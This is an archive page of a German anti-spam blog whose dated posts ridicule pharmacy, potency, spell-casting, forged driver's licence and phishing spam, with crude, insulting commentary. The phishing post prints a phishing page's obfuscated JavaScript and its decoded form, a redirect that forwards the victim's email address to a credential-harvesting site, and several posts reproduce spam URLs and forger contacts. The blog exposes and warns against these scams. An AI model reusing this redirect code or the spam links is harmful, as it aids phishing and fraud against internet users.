Schlagwortarchiv „Screenshot“

AgataZoowl

Sonntag, 9. August 2020

Perlen der täglichen Kommentarspam

So nannte sich der Pimmelquacksalber mit seiner IP-Adresse aus Russland (nein, nicht aus Peru) und seinem schlechten Spamskript, der mit dem folgenden, sehr kurzen Spamkommentar sein Pimmelpulver verkaufen wollte, aber am Spamfilter scheiterte:

Peruanisches Maca – Pulver fur Potenz – https://kshop5.pro/X8d0uu/

Wenn sich doch nur alle so knapp fassen würden!

Das Beste an dieser Spam ist allerdings die geschmackvoll gestaltete und in schönstem Spamdeutsch verfasste, aber ohne Impressum daherkommende Website eines Pimmelpulverexperten, auf der man landet…

$ lynx -mime_header https://kshop5.pro/X8d0uu/ | grep -i ^location
Location: http://eu.maka-peru.com/?channel=X8d0uu&click=359479046
$ _

…nachdem durch eine Weiterleitung noch schnell eine Affiliate-ID angehängt wurde, damit der Spammer auch sein Geld machen kann. Die klingt und sieht aus, und zwar so:

Ich zitiere:

Du bist kein Impotent!

Das ist alles bloß Müdigkeit und Psychologie.

Er kann nicht 24 Stunden pro Tag stehen!

Und ich erwidere: Du bist kein seriöser Anbieter! Das ist alles bloß Dummheit und kriminelle Energie, wie man leicht und mit großer Heiterkeit beim Hingucken sehen kann. Du kannst nicht 24 Stunden pro Tag Glück beim Denken haben. 🍀

Damit können Sie jedes Weibchen zum Stöhnen bringen!

Samstag, 8. August 2020

Vielleicht mit Elektroschocks? 🔌⚡

Von: Dr. rer. med. Schaefer <nils_schaefer@tad44.com>

Oha, hier schreibt ein Facharzt für Gestöhne. 👨‍⚕️

Unsere Damen mögen die Ausdauer. Unzählige Studien haben das bestätigt.

Ja, dann sollen „unsere Damen“ sich doch Ausdauersportler holen. 🏃

Falls Sie auch kleine Schwierigkeiten ab und zu haben – mit unserer Hilfe funktioniert das garantiert!

Aber ich bin gar keine Dame.

Wir respektieren und halten unsere Standards.
+ deutschlandweite zollfreie sehr schnelle Lieferung
+ nur geprüfte Pillchen aus Europa
+ frische Pillchen mit einem sehr langen Haltbarkeitsdatum
+ zuverlässige Bereitschaft in jeder Lebenslage

Aha, das ist mal wieder so ein Apotheker, in dessen Apotheke es nichts gegen eine Erkältung gibt, weil die Regale voller Pimmelpillen stehen.

Falls Sie umgehend Lösungen wollen, dann schauen Sie sich unsere Angebote an!

Natürlich ist es kein direkt gesetzter Link, es ist ja eine Spam:

$ location-cascade http://ocaoryvulle.hopto.org/
     1	http://qqfnl.nwflowtech.com
     2	https://berlin-apo.com/
$ host berlin-apo.com
berlin-apo.com has address 94.158.245.12
$ whois 94.158.245.12 | grep -i ‚^address‘
address:        str. Korolenko 6
address:        MD-2028
address:        Chisinau
address:        MOLDOVA, REPUBLIC OF
address:        MivoCloud
$ _

Eine Domain, die versucht, nach einer Berliner Apotheke zu klingen, aber auf einem Serverchen im schönen Moldavien liegt. Ist ganz sicher ein ganz toller, internationaler Spamapotheker. Mal schauen:

Die Spammer denken sich nicht einmal mehr neue Quatschfirmierungen für diese „Apotheken“ aus, in denen man zwar nichts gegen Kopfweh kaufen, aber dafür das „Viagra“ wie eine Vitamin-C-Brausetablette in sich reinkippen kann. Mit dreißig Prozent Bonuspillen. Kennt man ja so ähnlich von den Abzockcasinos. So weiß man gleich, dass die Gesundheit zum Glücksspiel wird. Und das Design ist auch seit Jahren unverändert. Das einzige, was sich bei diesem Dummenfang noch ändert, sind die Domains, die in den Spams verlinkt werden. 😫

Und nein, natürlich gibt es kein Viagra in dieser völlig impressumslosen „Online Apotheke Europe“. Und auch kein anderes Markenmedikament. Obwohl die Verpackung täuschend echt aussieht. Wenn dieser Giftapotheker überhaupt etwas liefert, dann sind die Tabletten eher wie Überraschungseier. Man weiß nicht vorher, was drin ist. Es kann sogar mal ein bisschen Sildenafil in irgendeiner Dosierung dabei sein, das soll schon vorgekommen sein. Oder auch mal Chemieabfälle und Rattengift. Wenn alle Glieder steif werden, dann vielleicht auch mal das eine. So ein schönes Überraschungsei! 🥚💀

Jeder „Apotheker“, der verschreibungspflichtige Medikamente ohne Rezept verkauft, ist ein Krimineller. In ganz Europa. Na, hat jemand Lust auf Medikamente von Kriminellen? Es geht ja nur um die Gesundheit… 💊

Diese Spam ist ein Zustecksel meines Lesers A. H.

spell casting online

Donnerstag, 30. Juli 2020

So nannte sich der Fluch von Kommentarautor mit seinem schlechten Spamskript und seiner IP-Adresse eines deutschen Hosters (hoffentlich wurde die Hosting-Rechnung im Voraus bezahlt), der den folgenden „Kommentar“ hier auf Unser täglich Spam veröffentlichen wollte, aber am Spamfilter scheiterte:

Name: spell casting online
Homepage: Spellsandpsychics.com
Mailadresse: …@gmail.com

It’s an remarkable article in support of all the internet visitors; they
will get advantaghe froom it I am sure.

Was bietet dieses Krepel mit seiner so SEO-wertig verlinkten Website an? Online-Zauberei? Ja, es ist tatsächlich Online-Zauberei. Gut festhalten, hier kommt Gundel Gaukeley mit ihrem für viel zu viel dafür verbranntes Geld käuflichem Hokuspokus für jede Lebenslage:

Sicher und bequem über Paypal oder Kreditkarte zu bezahlende Online-Hexerei! Wenn das Mittelalter aufs Internet trifft, der Aberglaube sich mit unverstandener Technik kombiniert, dann schrumpft das Hirn und kriegt das Geld wie von Zauberhand Flügel und flattert von dannen. 💸

Willkommen in einem 21. Jahrhundert, das ich mir vorher irgendwie anders vorgestellt habe. Wohin man auch schaut, die Dummheit erstickt alles. 🤪

Zu schade nur, dass die gute Zauberexpertin noch keinen Zauberspruch kennt, mit dem sie ihre Website bekannt machen kann. Und Geld herbeizaubern kann unsere Spamhexe auch nicht, so dass sie lieber ihre Hexerei als Dienstleistung verkauft. Deshalb muss sie auch spammen. Aber keine Sorge, vielleicht funktionieren ja die anderen Zaubersprüche. 🤦

Übrigens: Ein erheblicher Anteil der Kommentarspams hat IP-Adressen aus der BRD. Da wird einfach kurz mit Namen und Bankkonto eines unbeteiligten Dritten, dessen Daten sich die Spammer auf andere Weise geholt haben, ein Serverchen gemietet, auf dem die Spamskripten laufen können, und dann werden deutsche Websites vollgespammt, bis die Leitung qualmt. Der Hoster kann froh sein, wenn er dafür überhaupt Geld sieht. Ich bin mir sicher, dass diese Hexe in Kürze auch „deutschsprachige“ Kommentare aus einem Dada-Baukasten für Standardkommentare spammt. Wer Geoblocking als wichtigste Strategie zur Spamvermeidung nutzt, sperrt nicht nur Menschen aus, die Wert auf ihre Privatsphäre legen und ein VPN oder ein Anonymisierungsnetzwerk nutzen, nein, er wird auch zugespammt. 🙁

Also vergesst Geoblocking! Es ist meistens eine dumme Idee.

Tatty Generic Aids

Dienstag, 21. Juli 2020

So so, gewöhnliche Hilfen von Dr. Schäbig. Da bin ich aber heiß drauf! 🚑

Tatty Generic Aids

Das hast du schon im Betreff gesagt, Spammer. Und es wird durch die Wiederholung kein bisschen weniger schäbig. Und nein, es wirkt auch nicht intelligenter oder eindringlicher. Es ist einfach nur mechanisch und dumm. 🧟

Order high quality pills without limits!

Eine grenzenlose Welt hochqualitativer Pillen zum Leerkaufen und in sich reinschmeißen! Von Dr. rer. spam. Schäbig. Was kann dabei schon schiefgehen. Zu Risiken und Nebenwirkungen lesen sie die Todesanzeigen oder fragen sie ihren lokalen Bestattungsunternehmer! 💊💀

Worldwide shipping and 24/7 ordering

Man kann nicht nur rund um die Uhr bestellen, es wird sogar etwas geliefert, und zwar…

Have your order delivered free of charge!

…erfreulich ki-ka-kostenlos. Und auf dem ersten Blick sehen die pillz aus den meist russischen oder chinesischen Dreckskellern ganz ähnlich wie Medikamente aus. Die Farbe ist gut getroffen, und die Verpackung ist kaum vom Original zu unterscheiden. Wenn man Glück hat, wurden keine giftigen Chemieabfälle in die Zementmischer der mafiösen Dreckslabore gekippt und die pillz sind nur von minderwertiger Qualität. Also nicht direkt tödlich, sondern „nur“ ein bisschen gefährlich. Und wenn man noch mehr Glück hat, bekommt man gar nichts geliefert. Dann ist man zwar sein als Vorkasse abgelegtes Geld los, aber bleibt dafür wenigstens am Leben. 🍀

Enter market here

Klicken sie hier, um die Hölle zu betreten. 🖱️🔥

Der Link geht in ein von Crackern kriminell übernommenes WordPress-Blog, wo es nur eine Weiterleitung auf die Website in der Domain brandprice (punkt) su gibt. Und dort gibt es auch eine Website. Standesgemäß für eine spambeworbene Giftapotheke ohne jedes Impressum. Die Website sieht natürlich auch aus, und zwar so:

So schade, dass dieser freundliche, unter „CanadaPharmacy“ firmierende Apotheker mal wieder nur Pillen für den Pimmel im Angebot hat und einem nicht weiterhelfen kann, wenn man lästige und quälende Erkältungssymptome hat. Aber dafür liefert er angeblich verschreibungspflichtige Arzneien auch ohne ärztliches Rezept und ist damit in der ganzen zivilisierten Welt klar illegal. Deshalb hat er ja auch kein Impressum. Sonst käme ja die Polizei vorbei und würde diese lästigen Handschellen anlegen, und im Knast könnte er sein ergaunertes Geld gar nicht mehr bei Nutten und Kokain verprassen. Klar, dass er da keine Lust drauf hat. 💶

If You have problems, please visit this link in Your browser:
http://marinade-jet.com/wp-content/Bac_Sujets_3.php

Wer im Jahr 2020 immer noch nicht verstanden hat, wie man einen Link anklickt, kann alternativ auch die Adresse der von Kriminellen im gecrackten WordPress-Blog hochgeladenen Weiterleitungsseite über die Zwischenablage in die Adresszeile seines Browsers kopieren. Wer ein Geschäft so macht, wie es dieser schäbige Giftapotheker mit seinem Pimmelpillenverkauf macht, der darf keine Form der Dummheit, Blödheit und Idiotie unter seinen Kunden ausschließen – denn Menschen mit halbwegs normaler Intelligenz und Lebenserfahrung fallen eh nicht darauf rein, sondern nur die… ähm… intellektuell Herausgeforderten. Sogar solche, denen das Anklicken eines Links ein bisschen schwerfällt, können ja noch von ihrem Geld getrennt werden. 💸

Ob die Leute das überleben, ist dem spammenden Giftapotheker egal. Der interessiert sich nur für das Geld. 🤑

Vorschussbetrugseinleitung des Jahres

Donnerstag, 16. Juli 2020

Tweet von @TwitterSupport@twitter.com, verifizierter Kanal, vom 15. Juli 2020, 23:45 Uhr – der Original-Tweet ist inzwischen gelöscht:

Der überlagerte Schriftzug „SPAM“ ist natürlich von mir, um die Verwendung dieses Screenshots in einem immer noch laufenden Vorschussbetrug zu erschweren. Ich bin nicht so gern Bildhoster für Verbrecher. 😉

Wer hätte gedacht, dass die Zentralisierung der Kommunikation über die Websites irgendwelcher Unternehmen ohne seriöses Geschäftsmodell eine ganz schlechte Idee ist? Doch nur ein Mensch mit Gehirn. Ohne Gehirn kann man da ja gar nicht drauf kommen. Wenn Social-Media-Websites gecrackt werden – von Crackern natürlich, denn ihr wisst ja, die cracken nun einmal – dann bieten eben auf einmal Bill Gates, Elon Musk, Jeff Bezos, Apple und Uber eine leicht zu nutzende Geldsteckdose zum Verdoppeln von Bitcoin an. Natürlich stimmt das nicht, und natürlich handelt es sich bei diesen Tweets um Fälschungen eines Kriminellen, der bis jetzt allein über diesen Angriff einen sechsstelligen Dollarbetrag erschwindelt hat. Was er an weniger auffälligen Angriffen laufen hat, weiß ich nicht, aber dass dieser Kriminelle beinahe Vollzugriff auf Twitter hat, ist wohl offensichtlich, und er wird schon etwas damit anzufangen wissen.

Welche teilweise weit in die Privat- und Intimsphäre ragenden Daten bei diesem Angriff auf Twitter mitgenommen wurden, erfahren wir wohl erst in den nächsten Tagen. Oder es wird verschwiegen. Jenen, die das Versprechen Twitters von „sichereren Twitter“ dank Zwei-Faktor-Authentifizierung geglaubt haben und die brav ihre Telefonnummer angegeben haben, gratuliere ich recht herzlich. Wie man an den Übernahmen verifizierter Accounts sehen kann, hat die Zwei-Faktor-Authentifizierung nicht vor einer kriminellen Übernahme des Accounts geschützt, sondern nur eine Telefonnummer gegenüber einem datensammelnden Dritten in börsennotierter Reklamevermarktungslogik preisgegeben. Ist ja schön, wenn mal wieder jemand anruft. Und mit einen bisschen Glück sind die ganzen vom Wischofon mitgenommenen Daten – ihr habt ja alles nichts zu verbergen gehabt und hattet deshalb niemals Probleme mit trojanischen Apps wie der Twitter-App – ebenfalls in den Händen von Verbrechern und werden sicherlich demnächst auf den üblichen Marktplätzen für Verbrecher verhökert. Tja, wenn euch doch nur vorher jemand gewarnt hätte! Und die Smartphones sind ja so toll. Wenns Internet im Handy ist, ists Gehirn im Arsch. 📱🧠🔥

Ich finde es übrigens schade, dass beim Vorschussbetrug nicht für unterschiedliche Twitter-Kanäle unterschiedliche Bitcoin-Wallets verwendet wurden. Eine kleine Statistik aus der Alltagspraxis, wessen Follower wie naiv und leichtgläubig sind, wäre schon sehr interessant gewesen – und nicht besonders schmeichelhaft für Apple, nehme ich mal an.

Den USA wünsche ich viel Spaß bei ihrem Twitter-Wahlkrampf zur Präsidentenwahl im November. Angesichts des sehr banalen Betruges kann der Crackerangriff auf Twitter wohl nicht so schwierig gewesen sein… und inzwischen läuft ja auch ein Großteil der politischen Kommunikation über diese Social-Müll-Dienste.

clark wilson

Mittwoch, 1. Juli 2020

So nannte sich das hirnlose Gesäuge mit seiner IP-Adresse der Leaseweb Deutschland GmbH¹, der heute um 12:01 Uhr seine gefälschten Führerscheine mit folgender Kommentarspam zu einem sechs Wochen alten Artikel hier auf Unser täglich Spam verkaufen wollte:

Um einen deutschen zu beantragen, Österreichischen Führerschein, Schweizer Führerschein kontakt
(Whatsapp +491577562■■■■) (WhatsApp… +436812081■■■■) Kaufen Führerschein | kaufen Schweizer Führerschein | kaufen Österreich Führerschein | kaufen Deutscher Führerschein Kaufen Sie Kroatien Führerschein, Kaufen Sie einen tschechischen, Führerschein Kaufen Sie den niederländischen Führerschein

http://www.xn--fhrerscheinlocal-jzb.de/
Kontakt E-Mail ……. fuhrerscheinlocal@gmail.com
Allgemeine Unterstützung ……. veritabledocs24@gmail.com
(WhatsApp Deutschland… +491577562■■■■)
(WhatsApp Österreichp… +436812081■■■■)

NB: Wir sind hier, um Menschen zu helfen, die dringend Hilfe benötigen und Probleme beim Erwerb ihrer Lizenzen haben oder die Verbote hatten.

Beantragen Sie einen echten registrierten Führerschein, einen Deutscher Führerschein, einen österreichischen Führerschein, einen Schweizer Führerschein, einen deutschen Führerschein, einen EU-Führerschein, einen Führerschein erneuern und einen Führerschein austauschen.

Wir sind einzigartige Hersteller von nur echten registrierten Lizenzen. Echte echte Datenbank registriert. Wir können Ihnen eine neue Lizenz garantieren, auch wenn Sie mit Hilfe unserer Partner in verschiedenen Verkehrsbüros ein Verbot erhalten haben.

KONTAKT
Kontakt E-Mail ……. fuhrerscheinlocal@gmail.com
Allgemeine Unterstützung ……. veritabledocs24@gmail.com
(WhatsApp Deutschland… +491577562■■■■)
(WhatsApp Österreichp… +436812081■■■■)

Website…….. http://führerscheinlocal.de/kaufen-deutscher-fuhrerschein/
Website …….. http://führerscheinlocal.de/schweizer-fuhrerschein/
Website …….. http://führerscheinlocal.de/kaufen-osterreich-fuhrerschein/
Website …….. http://führerscheinlocal.de/kaufen-eu-fuhrerschein/
Website … http://führerscheinlocal.de/kontakt-uns/

Erkundigen Sie sich nach Ihrem Führerschein, insbesondere für EU-Länder.
Echt eingetragener USA (USA) Führerschein
Echt belgischer Führerschein
Echter brasilianischer (brasilianischer) Führerschein
Real Canadian (Canada) Führerschein
Echter finnischer (Finnland) Führerschein
Echt Französisch (Frankreich) Führerschein
Echter deutscher Führerschein
Real Dutch (Netherlands / Holland) Führerschein
Real Israel Pässe Führerschein
Beziehen Sie den Führerschein von Real UK (Vereinigtes Königreich)
Echt Spanisch (Spanien) Führerschein
Echter mexikanischer (Mexiko) Führerschein
Kaufen Sie original Austria Führerschein
Kaufen Sie echte kanadische Führerscheine,
Kaufen Sie echte Französisch (Frankreich) Führerscheine,
Legit Dutch (Netherlands / Holland) Führerscheine,
Immobilien Deutsch (Deutschland) Führerschein,
Sale Real UK (Großbritannien) Führerscheine,

Schlüsselwörter:

- Kaufen Sie einen EUCARIS-registrierten Führerschein
– Kaufen Schweizer Führerschein
– Kaufen Österreich Führerschein
-Kaufen Deutscher Führerschein
– Dokumente online kaufen und erneuern
-Kaufen Sie einen echten registrierten EU-Führerschein
– EU-Führerschein kaufen
-Kaufen Sie einen Original-Führerschein
– Kaufen Sie einen echten registrierten Führerschein online
-Führerschein online erneuern
-EU-Führerschein online kaufen
–Echten Führerschein online kaufen
– Legalen Führerschein online kaufen
– EU-Führerschein kaufen
– UK Führerschein kaufen
–Treiberlizenzaustausch
-Führerscheinaustausch
– Besorgen Sie sich einen echten EU-Führerschein, ohne Prüfungen zu schreiben
–Kaufen Sie online einen echten registrierten EU-Führerschein
–Kaufen Sie einen echten Führerschein

KONTAKTIEREN SIE UNSERE SUPPORTER

Kontakt E-Mail ……. fuhrerscheinlocal@gmail.com
Allgemeine Unterstützung ……. veritabledocs24@gmail.com
(WhatsApp Deutschland… +491577562■■■■)
(WhatsApp Österreichp… +436812081■■■■)

Website …….. http://führerscheinlocal.de/kaufen-deutscher-fuhrerschein/
Website …….. http://führerscheinlocal.de/schweizer-fuhrerschein/
Website …….. http://führerscheinlocal.de/kaufen-osterreich-fuhrerschein/
Website …….. http://führerscheinlocal.de/kaufen-eu-fuhrerschein/
Website … http://führerscheinlocal.de/kontakt-uns/

Statt vieler Worte für alle Freunde der spontanen Heiterkeit nur der Screenshot dieses „weltweiten Führerscheindienstleisters“ mit seinen „echten“ Führerscheinen:

Wer mir nicht glauben will, dass es sich bei diesen „Führerscheinen“ um Fälschungen handelt, und das zur Strafe für das Fahren ohne Fahrerlaubnis noch eine weitere Strafe für die Benutzung einer gefälschten Urkunde der Bundesrepublik Deutschland hinzukommt, frage bitte einfach mal auf der nächsten Polizeidienststelle! 👮

Aber auf gar keinen Fall auf solche spammenden Idioten reinfallen! Es ist teuer. Und die Vorstrafe kommt gleich hinterher.

¹Ich hoffe, Leaseweb hat Vorkasse genommen, denn dieser Verbrecher wird ganz sicher keine Rechnung bezahlen, nachdem er die Dienstleistung unter Missbrauch der Daten eines anderen Menschen in Anspruch genommen hat.

Fix pending mail issue.

Montag, 29. Juni 2020

Nicht drauf reinfallen, es ist Phishing! 🚨

Von: Web Admin <uk@fascil.shop>

Hier spammt der Administrator noch selbst, und…

An: gammelfleisch@tamagothi.de

…weil er das ganze Web nach irgendwelchen Mailadressen durchsucht, landet er mit seinem kriminellen Kommunikationsversuch auch prompt im Töpfchen für Sieger. 🚽

You have new pending messages

Echt? 🕵️

$ ssh -l name mailserver.example.org
name@mailsever.example.org $ mailq
Size             Queue ID                                                    Date
User             From
Status           Recipient
---------------- ---------------------------------------------------------
   0 messages.
name@mailsever.example.org $ _

Nein, habe ich nicht. Der Spammer lügt. 🤥

Dear gammelfleisch@tamagothi.de

Aber so was von ganz genau mein Name mal wieder! 👏

You have 7 New pending mails under the tamagothi.de mail network server. Your mail version 2.0.1 is currently being discontinued from receiving incoming e-mail, and will no longer work 48 hours from 6/27/2020

Was lernen wir aus diesem kurzen Absatz?

Sieben E-Mails können angeblich nicht zugestellt werden. ✉️
Das liegt daran, dass ich immer noch Mail in der Version 2.0.1 verwende, und das kriegt jetzt völlig grundlos keine Mail mehr. 🖕
Wenn ich jetzt nicht von Unkenntnis und Panik getrieben ganz schnell und völlig hirnlos reagiere, funktioniert E-Mail in ein paar Minuten gar nicht mehr für mich. Und zwar ebenfalls grundlos. 🥊🧠

Das ist natürlich Quatsch. Die Protokolle SMTP, IMAP und POP3 sind seit Jahrzehnten praktisch unverändert. Allerdings wurde immer wieder einmal eine kleinere Erweiterung angeflanscht, am häufigsten wohl an SMTP… 😉

Es werden also keine neuen „Mailversionen“ benötigt, um auf E-Mail zuzugreifen. Wenn ich es wollte, könnte ich wohl immer noch mit zehn Jahre alter Mailsoftware meine E-Mail erledigen. Aber wer will schon mit uralten Programmen voller ungefixter Sicherheitslöcher im Internet unterwegs sein, wenn es auch gute aktuelle Software gibt? ☠️

Dieser spammende „Web Admin“ lügt. Das von ihm behauptete Problem existiert nicht. Sein Gefasel soll nur Menschen mit geringen technischen Kenntnissen verblenden, erschrecken und unter gefühlten Zeitdruck setzen, damit sie jetzt klicken:

To retrieve your messages and upgrade to version 5.0.1, kindly follow the information below.

RESTORE MESSAGES NOW

Wer da klickt, lasse alle Hoffnung fahren! 🖱️🔥

$ lynx -mime_header https://wbbw3902889101.us-south.cf.appdomain.cloud/?35d44a299d135d44a299d1a2ba7c89f62ca2ba7c89f62c#gammelfleisch@tamagothi.de:35d44a299d1a2ba7c89f62c=377237g-
HTTP/1.0 200 OK
X-Backside-Transport: OK OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 29 Jun 2020 11:32:47 GMT
Server: Apache
Vary: Accept-Encoding
X-Global-Transaction-ID: 0d28ff5e5ef9d15f91a769e7
Connection: close
Content-Length: 2426

<script type="text/javascript">
  document.write(
    unescape(
      "%3C%21%44%4F%43%54%59%50%45%20%68%74%6D%6C%3E%0A%3C%68%74%6D%6C%20%6C%61%6E%67%3D%22%65%6E%22%3E%3C%68%65%61%64%3E%0A%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%63%6F%6E%74%65%6E%74%2D%74%79%70%65%22%20%63%6F%6E%74%65%6E%74%3D%22%74%65%78%74%2F%68%74%6D%6C%3B%20%63%68%61%72%73%65%74%3D%55%54%46%2D%38%22%3E%0A%20%20%20%20%20%20%0A%0A%3C%64%69%76%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79%3A%20%6E%6F%6E%65%3B%22%3E%0A%3C%66%6F%72%6D%20%6E%61%6D%65%3D%22%72%74%77%6F%64%6B%6C%70%22%3E%0A%3C%69%6E%70%75%74%20%74%79%70%65%3D%22%68%69%64%64%65%6E%22%20%6E%61%6D%65%3D%22%64%65%6C%73%6B%6A%6D%22%20%73%69%7A%65%3D%22%33%35%22%20%76%61%6C%75%65%3D%22%22%3E%0A%3C%2F%66%6F%72%6D%3E%0A%3C%2F%64%69%76%3E%0A%0A%0A%3C%73%63%72%69%70%74%3E%0A%76%61%72%20%6C%6F%63%61%74%65%20%3D%20%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%0A%64%6F%63%75%6D%65%6E%74%2E%72%74%77%6F%64%6B%6C%70%2E%64%65%6C%73%6B%6A%6D%2E%76%61%6C%75%65%20%3D%20%6C%6F%63%61%74%65%0A%76%61%72%20%74%65%78%74%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%72%74%77%6F%64%6B%6C%70%2E%64%65%6C%73%6B%6A%6D%2E%76%61%6C%75%65%0A%0A%0A%0A%66%75%6E%63%74%69%6F%6E%20%64%65%6C%69%6E%65%61%74%65%28%73%74%72%29%7B%0A%0A%74%68%65%6C%65%66%74%20%3D%20%73%74%72%2E%69%6E%64%65%78%4F%66%28%22%23%22%29%20%2B%20%31%3B%0A%74%68%65%72%69%67%68%74%20%3D%20%73%74%72%2E%6C%61%73%74%49%6E%64%65%78%4F%66%28%22%3A%22%29%3B%0A%72%65%74%75%72%6E%28%73%74%72%2E%73%75%62%73%74%72%69%6E%67%28%74%68%65%6C%65%66%74%2C%20%74%68%65%72%69%67%68%74%29%29%3B%0A%7D%0A%73%65%74%54%69%6D%65%6F%75%74%28%66%75%6E%63%74%69%6F%6E%28%29%20%7B%0A%20%20%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%2E%68%72%65%66%20%3D%20%22%68%74%74%70%73%3A%2F%2F%77%62%62%77%33%39%30%32%38%38%39%31%30%31%2E%75%73%2D%73%6F%75%74%68%2E%63%66%2E%61%70%70%64%6F%6D%61%69%6E%2E%63%6C%6F%75%64%2F%63%6F%6E%66%69%67%2F%74%6F%6B%65%6E%2F%3F%33%35%64%34%34%61%32%39%39%64%31%61%32%62%61%37%63%38%39%66%36%32%63%3D%22%20%2B%20%64%65%6C%69%6E%65%61%74%65%28%74%65%78%74%29%20%2B%20%22%26%30%30%30%39%79%79%65%69%6E%73%38%32%30%74%6E%74%49%44%3D%31%6B%62%72%33%38%38%77%6E%6A%33%66%36%35%61%63%63%2D%64%32%65%37%2D%30%39%38%75%2D%3A%6A%6E%73%64%6A%6A%38%38%39%30%30%30%77%30%22%3B%0A%7D%2C%20%30%30%30%30%29%3B%0A%3C%2F%73%63%72%69%70%74%3E%0A%3C%2F%68%65%61%64%3E%0A%3C%2F%62%6F%64%79%3E%0A%0A%0A%3C%2F%68%74%6D%6C%3E%0A%0A"
    )
  );
</script>
$ _

[Ja, ich kann die gammelfleisch-Adresse ruhig über eine im Link enthaltene, eindeutige ID bestätigen. Diese Adresse liegt sowieso als Magnet für Spammer im Impressum und kann von jedem Idioten des Internet direkt mit einem Skript aus einer offenen Quelle ausgelesen werden. Mit einer Mailadresse, die ich von Spam freihalten will, würde ich das allerdings nicht machen. Es wäre sehr dumm.]

Ach, so macht man Websites heute. Man schreibt sein HTML-Markup nicht mehr einfach rein, sondern programmiert stattdeseen Javascript, damit ein Programm das HTML-Markup reinschreibt.

Kein Mensch hätte einen derartigen überumständlichen Mummenschanz nötig. Hier will ein krimineller Idiot automatische Analysen erschweren. Aber zum Glück gibt es dafür Abhilfe, wenn man das generierte HTML mal lesen will (Javascript muss dafür erlaubt werden). Ja, ich könnte das auch schnell selbst mit einem dieser erschröcklich anzuschauenden Perl-Einzeiler machen, aber die eben verlinkte Seite kann jeder Mensch benutzen. Vielleicht hat ja der eine oder andere Mitleser auch Interesse. 😉

Beim „Rückgängigmachen der Unlesbarmachung“ kommt folgendes HTML heraus:

<!DOCTYPE html>
<html lang="en"><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
      

<div style="display: none;">
<form name="rtwodklp">
<input type="hidden" name="delskjm" size="35" value="">
</form>
</div>


<script>
var locate = window.location
document.rtwodklp.delskjm.value = locate
var text = document.rtwodklp.delskjm.value



function delineate(str){

theleft = str.indexOf("#") + 1;
theright = str.lastIndexOf(":");
return(str.substring(theleft, theright));
}
setTimeout(function() {
  window.location.href = "https://wbbw3902889101.us-south.cf.appdomain.cloud/config/token/?35d44a299d1a2ba7c89f62c=" + delineate(text) + "&0009yyeins820tntID=1kbr388wnj3f65acc-d2e7-098u-:jnsdjj889000w0";
}, 0000);
</script>
</head>
</body>


</html>

Auf so eine tolle Idee muss man auch erstmal kommen! Mit Javascript HTML generieren, das wiederum Javascript beinhaltet, das dann auf eine andere Adresse weiterleitet. Auf so eine Idee kommt nicht jeder. Dafür muss man schon eine vollständig ausgebrannte Blitzbirne sein. 💡

Übrigens: Wer einen Javascript-Blocker benutzt, kann auf Kriminelle, die ihre Absichten dermaßen trickreich vor automatischen Analysen verstecken, niemals hereinfallen. Tut das einfach, wenn es auch in den ersten Tagen ein bisschen unbequem sein kann, mit ein paar Klicks ein paar sinnvolle Ausnahmen zu konfigurieren. Danach hat man viel für seine Computersicherheit getan, und das kann schnell eine Menge Zeit, Geld und Ärger ersparen. 🛡️

Am Ende einiger weiterer Weiterleitungen landet man auf der folgenden Phishing-Website:

Die Zugangsdaten für die eigene Mailadresse, die man dort eingeben soll, gehen direkt an Kriminelle und werden für betrügerische Machenschaften unter fremder Identität benutzt. Das gilt übrigens auch, wenn man hinterher eine scheinbare Fehlermeldung der Marke „falsches Passwort“ angezeigt bekommt. 🙁

Und danach hat man den Schaden. 😫

Die Polizei ermittelt zunächst gegen den Inhaber der Mailadresse, und die Verbrecher bleiben in ihrer Anonymität und bekommen leider keinen längeren Aufenthalt im JVA-Hotel. Dass sie keine „verdächtige“ Freemailer-Adresse benutzen, gibt ihren Betrugsgeschäften sogar noch eine höhere Seriosität und ermöglicht ihnen, einen noch größeren Schaden anzurichten.

Ach ja, die eigene Mailadresse ist danach natürlich auch verbrannt.

Regard

Email Admin 2020 | All rights reserved.

Diese Spam wurde mechanisch erstellt und ist ohne Unterschrift gültig. Natürlich mit proklamierten „geistigen Eigentum“ auf mechanischen Output. 🤡

sdk.rethinkrobotics.com

Montag, 1. Juni 2020

So nannte sich der Honk mit seiner deutschen IP-Adresse eines großen, international tätigen Hosters, der heute um 10:59 Uhr den folgenden Kommentar hier auf Unser täglich Spam veröffentlichen wollte, aber am Spamfilter scheiterte:

Have you ever thought about creating an e-book or guest authoring on other websites?
I have a blog based on the same subjects you discuss and would love to have you share some stories/information. I know my viewers would value your work.
If you‘re even remotely interested, feel free to shoot me an e mail.

Nein, Spammer, ich habe kein Interesse daran, für so einen kommentarspammenden Ekel-SEO aus der letzten Reihe wie dich irgendwelche Texte zu schreiben, und nein, wenn ich dir etwas „rüberschießen“ möchte, dann ist es ganz sicher keine E-Mail, sondern etwas mit deutlich mehr Mannstoppwirkung. 🔫

Deine lustige Website, mit der du mutmaßlich Menschen indonesischer Zunge dazu bringen willst, dass sie ihr bisschen meist bitter erarbeitetes Geld in windigen bis betrügerischen Internet-Casinos verlieren – kennt man ja, bei den „kostenlosen Probespielen“ wird gewonnen, bei den Spielen um Geld dann nicht mehr so – damit du Fäkalmade ein paar Affiliate-Judasgroschen kriegst…

…darfst du dir gern hinstecken, wo die Sonne niemals hinscheint. 🖕

Du bist widerlich! 🤮